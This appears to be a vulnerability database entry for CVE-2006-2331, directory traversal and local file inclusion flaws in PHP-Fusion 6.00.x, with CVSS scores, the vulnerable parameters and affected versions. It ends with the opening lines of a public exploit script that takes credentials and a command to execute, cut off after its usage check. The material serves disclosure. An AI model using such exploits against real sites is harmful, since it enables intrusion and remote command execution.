CVE-2006-2331

Published: 12/05/2006 Updated: 18/10/2018
CVSS v2 Base Score: 6.4 | Impact Score: 4.9 | Exploitability Score: 10
VMScore: 645
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N

Vulnerability Summary

Multiple directory traversal vulnerabilities in PHP-Fusion 6.00.306 allow remote malicious users to include and execute arbitrary local files via (1) a .. (dot dot) in the settings[locale] parameter in infusions/last_seen_users_panel/last_seen_users_panel.php, and (2) a .. (dot dot) in the localeset parameter in setup.php. NOTE: the vendor states that this issue might exist due to problems in third party local files.

Vulnerable Product

php fusion php fusion 6.00.106

php fusion php fusion 6.00.107

php fusion php fusion 6.00.304

php fusion php fusion 6.00.306

php fusion php fusion 6.00.105

php fusion php fusion 6.00.3

php fusion php fusion 6.00.303

php fusion php fusion 6.00.109

php fusion php fusion 6.00.110

php fusion php fusion 6.00.204

php fusion php fusion 6.00.206

Exploits

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "PHPFusion <= v6.00.306 avatar mod_mime arbitrary file upload &\r\n";
echo "local inclusion vulnerabilities\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: retrogod.altervista.org\r\n\r\n";
if ($argc<6) {
    echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\r\n";
...